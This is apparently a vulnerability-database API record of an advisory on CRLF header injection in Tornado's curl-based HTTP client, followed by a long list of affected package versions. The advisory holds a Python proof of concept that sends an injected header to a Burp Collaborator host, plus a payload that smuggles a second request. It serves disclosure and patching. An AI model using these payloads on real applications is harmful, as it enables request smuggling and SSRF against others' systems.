Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/18238?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/18238?format=api", "vulnerability_id": "VCID-y14s-8wpj-wygd", "summary": "Tornado has a CRLF injection in CurlAsyncHTTPClient headers\n### Summary\nTornado’s `curl_httpclient.CurlAsyncHTTPClient` class is vulnerable to CRLF (carriage return/line feed) injection in the request headers.\n\n### Details\nWhen an HTTP request is sent using `CurlAsyncHTTPClient`, Tornado does not reject carriage return (\\r) or line feed (\\n) characters in the request headers. As a result, if an application includes an attacker-controlled header value in a request sent using `CurlAsyncHTTPClient`, the attacker can inject arbitrary headers into the request or cause the application to send arbitrary requests to the specified server.\n\nThis behavior differs from that of the standard `AsyncHTTPClient` class, which does reject CRLF characters.\n\nThis issue appears to stem from libcurl's (as well as pycurl's) lack of validation for the [`HTTPHEADER`](https://curl.se/libcurl/c/CURLOPT_HTTPHEADER.html) option. libcurl’s documentation states:\n\n> The headers included in the linked list must not be CRLF-terminated, because libcurl adds CRLF after each header item itself. Failure to comply with this might result in strange behavior. libcurl passes on the verbatim strings you give it, without any filter or other safe guards. That includes white space and control characters.\n\npycurl similarly appears to assume that the headers adhere to the correct format. Therefore, without any validation on Tornado’s part, header names and values are included verbatim in the request sent by `CurlAsyncHTTPClient`, including any control characters that have special meaning in HTTP semantics.\n\n### PoC\nThe issue can be reproduced using the following script:\n\n```python\nimport asyncio\n\nfrom tornado import httpclient\nfrom tornado import curl_httpclient\n\nasync def main():\n http_client = curl_httpclient.CurlAsyncHTTPClient()\n\n request = httpclient.HTTPRequest(\n # Burp Collaborator payload\n \"http://727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com/\",\n method=\"POST\",\n body=\"body\",\n # Injected header using CRLF characters\n headers={\"Foo\": \"Bar\\r\\nHeader: Injected\"}\n )\n\n response = await http_client.fetch(request)\n print(response.body)\n\n http_client.close()\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n```\n\nWhen the specified server receives the request, it contains the injected header (`Header: Injected`) on its own line:\n\n```http\nPOST / HTTP/1.1\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com\nUser-Agent: Mozilla/5.0 (compatible; pycurl)\nAccept: */*\nAccept-Encoding: gzip,deflate\nFoo: Bar\nHeader: Injected\nContent-Length: 4\nContent-Type: application/x-www-form-urlencoded\n\nbody\n```\n\nThe attacker can also construct entirely new requests using a payload with multiple CRLF sequences. For example, specifying a header value of `\\r\\n\\r\\nPOST /attacker-controlled-url HTTP/1.1\\r\\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com` results in the server receiving an additional, attacker-controlled request:\n\n```http\nPOST /attacker-controlled-url HTTP/1.1\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com\nContent-Length: 4\nContent-Type: application/x-www-form-urlencoded\n\nbody\n```\n\n### Impact\nApplications using the Tornado library to send HTTP requests with untrusted header data are affected. This issue may facilitate the exploitation of server-side request forgery (SSRF) vulnerabilities.", "aliases": [ { "alias": "GHSA-w235-7p84-xx57" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/58666?format=api", "purl": "pkg:pypi/tornado@6.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.4.1" } ], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/2261?format=api", "purl": "pkg:pypi/tornado@0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/2262?format=api", "purl": "pkg:pypi/tornado@1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/2263?format=api", "purl": "pkg:pypi/tornado@1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/2264?format=api", "purl": "pkg:pypi/tornado@1.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@1.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/2265?format=api", "purl": "pkg:pypi/tornado@1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/2266?format=api", "purl": "pkg:pypi/tornado@1.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@1.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/2267?format=api", "purl": "pkg:pypi/tornado@2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/2268?format=api", "purl": "pkg:pypi/tornado@2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/2269?format=api", "purl": "pkg:pypi/tornado@2.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/2270?format=api", "purl": "pkg:pypi/tornado@2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-byy6-ku5b-ykew" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/2271?format=api", "purl": "pkg:pypi/tornado@2.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9944?format=api", "purl": "pkg:pypi/tornado@2.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/9945?format=api", "purl": "pkg:pypi/tornado@2.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/9946?format=api", "purl": "pkg:pypi/tornado@2.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.4.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9947?format=api", "purl": "pkg:pypi/tornado@3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/9948?format=api", "purl": "pkg:pypi/tornado@3.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9949?format=api", "purl": "pkg:pypi/tornado@3.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/9950?format=api", "purl": "pkg:pypi/tornado@3.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9951?format=api", "purl": "pkg:pypi/tornado@3.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9952?format=api", "purl": "pkg:pypi/tornado@3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/9953?format=api", "purl": "pkg:pypi/tornado@3.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/9954?format=api", "purl": "pkg:pypi/tornado@3.2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35053?format=api", "purl": "pkg:pypi/tornado@4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/35054?format=api", "purl": "pkg:pypi/tornado@4.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35055?format=api", "purl": "pkg:pypi/tornado@4.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35056?format=api", "purl": "pkg:pypi/tornado@4.1b2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.1b2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35057?format=api", "purl": "pkg:pypi/tornado@4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35058?format=api", "purl": "pkg:pypi/tornado@4.2b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.2b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35059?format=api", "purl": "pkg:pypi/tornado@4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35060?format=api", "purl": "pkg:pypi/tornado@4.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35061?format=api", "purl": "pkg:pypi/tornado@4.3b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.3b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35062?format=api", "purl": "pkg:pypi/tornado@4.3b2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.3b2" }, { "url": "http://public2.vulnerablecode.io/api/packages/35063?format=api", "purl": "pkg:pypi/tornado@4.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/35065?format=api", "purl": "pkg:pypi/tornado@4.4b1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@4.4b1" }, { "url": "http://public2.vulnerablecode.io/api/packages/35066?format=api", "purl": "pkg:pypi/tornado@4.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { 